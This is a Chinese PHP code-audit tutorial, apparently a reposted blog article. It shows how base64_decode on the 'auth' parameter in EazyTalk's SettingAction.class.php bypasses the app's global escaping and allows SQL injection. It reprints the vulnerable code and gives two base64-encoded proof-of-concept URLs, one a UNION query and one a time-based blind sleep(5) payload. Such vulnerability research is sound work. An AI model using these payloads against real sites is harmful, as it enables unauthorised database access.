【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

2.使用Seay代码审计系统的全局搜索功能，搜索包含关键字为”base64_decode”的文件，发现SettingAction.class.php包含一个对接收的参数auth进行base64_decode的地方：

3.我们跟进这个php文件，发现虽然使用daddslashes函数进行了注入过滤，但是使用了base64_decode函数对参数auth进行了转码从而可以绕过过滤造成注入：

//认证电子邮件
public function doauth() {
    $_authmsg=daddslashes($_GET[‘auth‘]);//再次判断GPC是否开启并进行注入过滤
    $authmsg=base64_decode($_authmsg);//base64_decode函数对参数进行转码处理
    $tem=explode(":",$authmsg);//对解码后的参数authmsg按照“：”进行分割存入数组tem中
    $send_id=$tem[0];
    $user=M(‘Users‘);

    $row = $user->field(‘mailadres,auth_email‘)->where("user_id=‘$send_id‘")->find();//带入查询，在where子句里，造成注入
    if ($_authmsg==$row[‘auth_email‘]) {
        $user->where("user_id=‘$send_id‘")->setField(‘auth_email‘,1);
        setcookie(‘setok‘, json_encode(array(‘lang‘=>L(‘mail6‘),‘ico‘=>1)),0,‘/‘);
    } else {
        setcookie(‘setok‘, json_encode(array(‘lang‘=>L(‘mail7‘),‘ico‘=>2)),0,‘/‘);
    }
    header(‘location:‘.SITE_URL.‘/?m=setting&a=mailauth‘);
}

0x04 漏洞证明

构造获取数据库相关信息的POC：

http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==

查看sql语句发现成功执行：

发现这里是一个盲注，并没有输出，所以我们使用sql盲注的语句。获取当前数据库用户名的第一个字符是不是‘r’（ascii值为114）的POC：

http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksMSwxKSkgPSAxMTQpLHNsZWVwKDUpLDApKSM=

页面持续了5秒，说明user()的第一个字符为‘r’，查看sql语句发现成功执行：

最后，有兴趣的同学可以自己写个py脚本来跑这种盲注。

原文链接：http://www.cnbraid.com/2016/02/18/sql2/，如需转载请联系作者。

【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

标签：